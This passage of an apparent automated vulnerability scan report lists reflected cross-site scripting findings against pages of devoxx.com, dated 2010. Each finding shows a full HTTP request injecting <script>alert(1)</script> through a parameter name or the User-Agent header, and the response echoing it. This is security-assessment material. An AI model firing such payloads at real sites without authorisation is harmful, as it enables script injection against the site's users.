currentURL : '/display/Devoxx2K10/Newsletter?4c08e--><script>alert(1)</script>092395d5d3c=1'
contextPath : ''
action name : 'viewpage'
*********
adaptavist.builder.sitemeshPage: com.opensymphony.module.sitemesh.parser.FastPage@305a36d4
adaptavist.builder.helper: com.atlass
...[SNIP]...

1.13. http://devoxx.com/display/Devoxx2K10/Oracle [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://devoxx.com
Path:   /display/Devoxx2K10/Oracle

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload a2a9c--><script>alert(1)</script>b30a96574db was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /display/Devoxx2K10/Oracle?a2a9c--><script>alert(1)</script>b30a96574db=1 HTTP/1.1
Host: devoxx.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=D5313254AFFC9A0CE82BE5FDA21303DD;

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 17:42:20 GMT
Cache-Control: no-cache, must-revalidate
Expires: Thu, 01 Jan 1970 00:00:00 GMT
X-Confluence-Request-Time: 1289842940633
Content-Type: text/html;charset=UTF-8
Connection: close
Content-Length: 35040

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<!--
userAgent: 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)'
layout : 'Builder Layout: DEVOXX2010NSB'
layoutId : 'DEVOXX2010NSB'
spaceName : 'Devoxx 2010'
currentURL : '/display/Devoxx2K10/Oracle?a2a9c--><script>alert(1)</script>b30a96574db=1'
contextPath : ''
action name : 'viewpage'
*********
adaptavist.builder.sitemeshPage: com.opensymphony.module.sitemesh.parser.FastPage@4caf8a0c
adaptavist.builder.helper: com.atlass
...[SNIP]...

1.14. http://devoxx.com/display/Devoxx2K10/Partners [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://devoxx.com
Path:   /display/Devoxx2K10/Partners

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload e7bf9--><script>alert(1)</script>834c95c00a5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /display/Devoxx2K10/Partners?e7bf9--><script>alert(1)</script>834c95c00a5=1 HTTP/1.1
Host: devoxx.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=D5313254AFFC9A0CE82BE5FDA21303DD;

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 17:40:04 GMT
Cache-Control: no-cache, must-revalidate
Expires: Thu, 01 Jan 1970 00:00:00 GMT
X-Confluence-Request-Time: 1289842804782
Content-Type: text/html;charset=UTF-8
Connection: close
Content-Length: 34094

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<!--
userAgent: 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)'
layout : 'Builder Layout: DEVOXX2010'
layoutId : 'DEVOXX2010'
spaceName : 'Devoxx 2010'
currentURL : '/display/Devoxx2K10/Partners?e7bf9--><script>alert(1)</script>834c95c00a5=1'
contextPath : ''
action name : 'viewpage'
*********
adaptavist.builder.sitemeshPage: com.opensymphony.module.sitemesh.parser.FastPage@b64716e
adaptavist.builder.helper: com.atlassi
...[SNIP]...

1.15. http://devoxx.com/display/Devoxx2K10/Practical [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://devoxx.com
Path:   /display/Devoxx2K10/Practical

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 87fb1--><script>alert(1)</script>fa619441419 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /display/Devoxx2K10/Practical?87fb1--><script>alert(1)</script>fa619441419=1 HTTP/1.1
Host: devoxx.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=D5313254AFFC9A0CE82BE5FDA21303DD;

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 17:40:12 GMT
Cache-Control: no-cache, must-revalidate
Expires: Thu, 01 Jan 1970 00:00:00 GMT
X-Confluence-Request-Time: 1289842812479
Content-Type: text/html;charset=UTF-8
Connection: close
Content-Length: 35083

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<!--
userAgent: 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)'
layout : 'Builder Layout: DEVOXX2010'
layoutId : 'DEVOXX2010'
spaceName : 'Devoxx 2010'
currentURL : '/display/Devoxx2K10/Practical?87fb1--><script>alert(1)</script>fa619441419=1'
contextPath : ''
action name : 'viewpage'
*********
adaptavist.builder.sitemeshPage: com.opensymphony.module.sitemesh.parser.FastPage@7e6b6109
adaptavist.builder.helper: com.atlass
...[SNIP]...

1.16. http://devoxx.com/display/Devoxx2K10/Privacy+Policy [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://devoxx.com
Path:   /display/Devoxx2K10/Privacy+Policy

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 77c41--><script>alert(1)</script>111adc9d0f1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /display/Devoxx2K10/Privacy+Policy?77c41--><script>alert(1)</script>111adc9d0f1=1 HTTP/1.1
Host: devoxx.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=D5313254AFFC9A0CE82BE5FDA21303DD;

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 17:42:40 GMT
Cache-Control: no-cache, must-revalidate
Expires: Thu, 01 Jan 1970 00:00:00 GMT
X-Confluence-Request-Time: 1289842960557
Content-Type: text/html;charset=UTF-8
Connection: close
Content-Length: 41989

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<!--
userAgent: 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)'
layout : 'Builder Layout: DEVOXX2010'
layoutId : 'DEVOXX2010'
spaceName : 'Devoxx 2010'
currentURL : '/display/Devoxx2K10/Privacy+Policy?77c41--><script>alert(1)</script>111adc9d0f1=1'
contextPath : ''
action name : 'viewpage'
*********
adaptavist.builder.sitemeshPage: com.opensymphony.module.sitemesh.parser.FastPage@7874036d
adaptavist.builder.helper: com.atlass
...[SNIP]...

1.17. http://devoxx.com/display/Devoxx2K10/Schedule [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://devoxx.com
Path:   /display/Devoxx2K10/Schedule

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 94dc9--><script>alert(1)</script>2d39d89cec9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /display/Devoxx2K10/Schedule?94dc9--><script>alert(1)</script>2d39d89cec9=1 HTTP/1.1
Host: devoxx.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=D5313254AFFC9A0CE82BE5FDA21303DD;

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 17:40:10 GMT
Cache-Control: no-cache, must-revalidate
Expires: Thu, 01 Jan 1970 00:00:00 GMT
X-Confluence-Request-Time: 1289842810669
Content-Type: text/html;charset=UTF-8
Connection: close
Content-Length: 38725

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<!--
userAgent: 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)'
layout : 'Builder Layout: DEVOXX2010NSB'
layoutId : 'DEVOXX2010NSB'
spaceName : 'Devoxx 2010'
currentURL : '/display/Devoxx2K10/Schedule?94dc9--><script>alert(1)</script>2d39d89cec9=1'
contextPath : ''
action name : 'viewpage'
*********
adaptavist.builder.sitemeshPage: com.opensymphony.module.sitemesh.parser.FastPage@758d7c42
adaptavist.builder.helper: com.atlass
...[SNIP]...

1.18. http://devoxx.com/display/Devoxx2K10/Schedule+REST+interface [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://devoxx.com
Path:   /display/Devoxx2K10/Schedule+REST+interface

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 8b508--><script>alert(1)</script>c8a72497573 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /display/Devoxx2K10/Schedule+REST+interface?8b508--><script>alert(1)</script>c8a72497573=1 HTTP/1.1
Host: devoxx.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=D5313254AFFC9A0CE82BE5FDA21303DD;

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 17:41:29 GMT
Cache-Control: no-cache, must-revalidate
Expires: Thu, 01 Jan 1970 00:00:00 GMT
X-Confluence-Request-Time: 1289842889847
Content-Type: text/html;charset=UTF-8
Connection: close
Content-Length: 75562

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<!--
userAgent: 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)'
layout : 'Builder Layout: DEVOXX2010NSB'
layoutId : 'DEVOXX2010NSB'
spaceName : 'Devoxx 2010'
currentURL : '/display/Devoxx2K10/Schedule+REST+interface?8b508--><script>alert(1)</script>c8a72497573=1'
contextPath : ''
action name : 'viewpage'
*********
adaptavist.builder.sitemeshPage: com.opensymphony.module.sitemesh.parser.FastPage@16ef0c99
adaptavist.builder.helper: com.atlass
...[SNIP]...

1.19. http://devoxx.com/display/Devoxx2K10/Schedules [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://devoxx.com
Path:   /display/Devoxx2K10/Schedules

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload df923--><script>alert(1)</script>b1370082457 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /display/Devoxx2K10/Schedules?df923--><script>alert(1)</script>b1370082457=1 HTTP/1.1
Host: devoxx.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=D5313254AFFC9A0CE82BE5FDA21303DD;

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 17:41:17 GMT
Cache-Control: no-cache, must-revalidate
Expires: Thu, 01 Jan 1970 00:00:00 GMT
X-Confluence-Request-Time: 1289842877387
Content-Type: text/html;charset=UTF-8
Connection: close
Content-Length: 44902

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<!--
userAgent: 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)'
layout : 'Builder Layout: DEVOXX2010'
layoutId : 'DEVOXX2010'
spaceName : 'Devoxx 2010'
currentURL : '/display/Devoxx2K10/Schedules?df923--><script>alert(1)</script>b1370082457=1'
contextPath : ''
action name : 'viewpage'
*********
adaptavist.builder.sitemeshPage: com.opensymphony.module.sitemesh.parser.FastPage@14d4514a
adaptavist.builder.helper: com.atlass
...[SNIP]...

1.20. http://devoxx.com/display/Devoxx2K10/Sidebar [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://devoxx.com
Path:   /display/Devoxx2K10/Sidebar

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload aab21--><script>alert(1)</script>8f8e23b7fa2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /display/Devoxx2K10/Sidebar?aab21--><script>alert(1)</script>8f8e23b7fa2=1 HTTP/1.1
Host: devoxx.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=D5313254AFFC9A0CE82BE5FDA21303DD;

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 17:40:06 GMT
Cache-Control: no-cache, must-revalidate
Expires: Thu, 01 Jan 1970 00:00:00 GMT
X-Confluence-Request-Time: 1289842806553
Content-Type: text/html;charset=UTF-8
Connection: close
Content-Length: 34277

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<!--
userAgent: 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)'
layout : 'Builder Layout: DEVOXX2010'
layoutId : 'DEVOXX2010'
spaceName : 'Devoxx 2010'
currentURL : '/display/Devoxx2K10/Sidebar?aab21--><script>alert(1)</script>8f8e23b7fa2=1'
contextPath : ''
action name : 'viewpage'
*********
adaptavist.builder.sitemeshPage: com.opensymphony.module.sitemesh.parser.FastPage@7978200a
adaptavist.builder.helper: com.atlass
...[SNIP]...

1.21. http://devoxx.com/display/Devoxx2K10/Sponsors [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://devoxx.com
Path:   /display/Devoxx2K10/Sponsors

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload e446f--><script>alert(1)</script>d63727a51fa was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /display/Devoxx2K10/Sponsors?e446f--><script>alert(1)</script>d63727a51fa=1 HTTP/1.1
Host: devoxx.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=D5313254AFFC9A0CE82BE5FDA21303DD;

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 17:42:32 GMT
Cache-Control: no-cache, must-revalidate
Expires: Thu, 01 Jan 1970 00:00:00 GMT
X-Confluence-Request-Time: 1289842952469
Content-Type: text/html;charset=UTF-8
Connection: close
Content-Length: 42427

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<!--
userAgent: 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)'
layout : 'Builder Layout: DEVOXX2010NSB'
layoutId : 'DEVOXX2010NSB'
spaceName : 'Devoxx 2010'
currentURL : '/display/Devoxx2K10/Sponsors?e446f--><script>alert(1)</script>d63727a51fa=1'
contextPath : ''
action name : 'viewpage'
*********
adaptavist.builder.sitemeshPage: com.opensymphony.module.sitemesh.parser.FastPage@1aa51ce1
adaptavist.builder.helper: com.atlass
...[SNIP]...

1.22. http://devoxx.com/display/Devoxx2K10/Twitter [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://devoxx.com
Path:   /display/Devoxx2K10/Twitter

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 52c4c--><script>alert(1)</script>5fd2ec3b8e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /display/Devoxx2K10/Twitter?52c4c--><script>alert(1)</script>5fd2ec3b8e=1 HTTP/1.1
Host: devoxx.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=D5313254AFFC9A0CE82BE5FDA21303DD;

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 17:42:44 GMT
Cache-Control: no-cache, must-revalidate
Expires: Thu, 01 Jan 1970 00:00:00 GMT
X-Confluence-Request-Time: 1289842964524
Content-Type: text/html;charset=UTF-8
Connection: close
Content-Length: 48598

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<!--
userAgent: 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)'
layout : 'Builder Layout: DEVOXX2010NSB'
layoutId : 'DEVOXX2010NSB'
spaceName : 'Devoxx 2010'
currentURL : '/display/Devoxx2K10/Twitter?52c4c--><script>alert(1)</script>5fd2ec3b8e=1'
contextPath : ''
action name : 'viewpage'
*********
adaptavist.builder.sitemeshPage: com.opensymphony.module.sitemesh.parser.FastPage@4d21dfd4
adaptavist.builder.helper: com.atlass
...[SNIP]...

1.23. http://devoxx.com/ [User-Agent HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://devoxx.com
Path:   /

Issue detail

The value of the User-Agent HTTP header is copied into an HTML comment. The payload a9adf--><script>alert(1)</script>e063112f8a0 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET / HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)a9adf--><script>alert(1)</script>e063112f8a0
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: devoxx.com

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 17:37:55 GMT
Cache-Control: no-cache, must-revalidate
Expires: Thu, 01 Jan 1970 00:00:00 GMT
X-Confluence-Request-Time: 1289842675105
Vary: User-Agent
Content-Type: text/html;charset=UTF-8
Content-Length: 38366

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<!--
userAgent: 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)a9adf--><script>alert(1)</script>e063112f8a0'
layout : 'Builder Layout: DEVOXX2010'
layoutId : 'DEVOXX2010'
spaceName : 'Devoxx 2010'
currentURL : '/display/Devoxx2K10/Home'
contextPath : ''
action name : 'viewpage'
********
...[SNIP]...

1.24. http://devoxx.com/display/Devoxx2K10 [User-Agent HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://devoxx.com
Path:   /display/Devoxx2K10

Issue detail

The value of the User-Agent HTTP header is copied into an HTML comment. The payload cc315--><script>alert(1)</script>b009e1f4053 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /display/Devoxx2K10 HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)cc315--><script>alert(1)</script>b009e1f4053
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: devoxx.com
Cookie: JSESSIONID=D5313254AFFC9A0CE82BE5FDA21303DD

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 17:37:35 GMT
Cache-Control: no-cache, must-revalidate
Expires: Thu, 01 Jan 1970 00:00:00 GMT
X-Confluence-Request-Time: 1289842655791
Vary: User-Agent
Content-Type: text/html;charset=UTF-8
Content-Length: 38367

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<!--
userAgent: 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)cc315--><script>alert(1)</script>b009e1f4053'
layout : 'Builder Layout: DEVOXX2010'
layoutId : 'DEVOXX2010'
spaceName : 'Devoxx 2010'
currentURL : '/display/Devoxx2K10/Home'
contextPath : ''
action name : 'viewpage'
********
...[SNIP]...

1.25. http://devoxx.com/display/Devoxx2K10/Contact+Us [User-Agent HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://devoxx.com
Path:   /display/Devoxx2K10/Contact+Us

Issue detail

The value of the User-Agent HTTP header is copied into an HTML comment. The payload c556a--><script>alert(1)</script>8d773148ea2 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /display/Devoxx2K10/Contact+Us HTTP/1.1
Host: devoxx.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)c556a--><script>alert(1)</script>8d773148ea2
Connection: close
Cookie: JSESSIONID=D5313254AFFC9A0CE82BE5FDA21303DD;

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 17:43:04 GMT
Cache-Control: no-cache, must-revalidate
Expires: Thu, 01 Jan 1970 00:00:00 GMT
X-Confluence-Request-Time: 1289842984417
Content-Type: text/html;charset=UTF-8
Connection: close
Content-Length: 35861

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<!--
userAgent: 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)c556a--><script>alert(1)</script>8d773148ea2'
layout : 'Builder Layout: DEVOXX2010'
layoutId : 'DEVOXX2010'
spaceName : 'Devoxx 2010'
currentURL : '/display/Devoxx2K10/Contact+Us'
contextPath : ''
action name : 'viewpage'
**
...[SNIP]...

1.26. http://devoxx.com/display/Devoxx2K10/Devoxx+2008 [User-Agent HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://devoxx.com
Path:   /display/Devoxx2K10/Devoxx+2008

Issue detail

The value of the User-Agent HTTP header is copied into an HTML comment. The payload b82a0--><script>alert(1)</script>818a669cdc was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /display/Devoxx2K10/Devoxx+2008 HTTP/1.1
Host: devoxx.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)b82a0--><script>alert(1)</script>818a669cdc
Connection: close
Cookie: JSESSIONID=D5313254AFFC9A0CE82BE5FDA21303DD;

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 17:45:34 GMT
Cache-Control: no-cache, must-revalidate
Expires: Thu, 01 Jan 1970 00:00:00 GMT
X-Confluence-Request-Time: 1289843134360
Content-Type: text/html;charset=UTF-8
Connection: close
Content-Length: 140842

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<!--
userAgent: 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)b82a0--><script>alert(1)</script>818a669cdc'
layout : 'Builder Layout: DEVOXX2010'
layoutId : 'DEVOXX2010'
spaceName : 'Devoxx 2010'
currentURL : '/display/Devoxx2K10/Devoxx+2008'
contextPath : ''
action name : 'viewpage'
*
...[SNIP]...

1.27. http://devoxx.com/display/Devoxx2K10/Devoxx+2009 [User-Agent HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://devoxx.com
Path:   /display/Devoxx2K10/Devoxx+2009

Issue detail

The value of the User-Agent HTTP header is copied into an HTML comment. The payload 739cc--><script>alert(1)</script>1003ca2f40e was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /display/Devoxx2K10/Devoxx+2009 HTTP/1.1
Host: devoxx.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)739cc--><script>alert(1)</script>1003ca2f40e
Connection: close
Cookie: JSESSIONID=D5313254AFFC9A0CE82BE5FDA21303DD;

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 17:47:07 GMT
Cache-Control: no-cache, must-revalidate
Expires: Thu, 01 Jan 1970 00:00:00 GMT
X-Confluence-Request-Time: 1289843227872
Content-Type: text/html;charset=UTF-8
Connection: close
Content-Length: 174347

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<!--
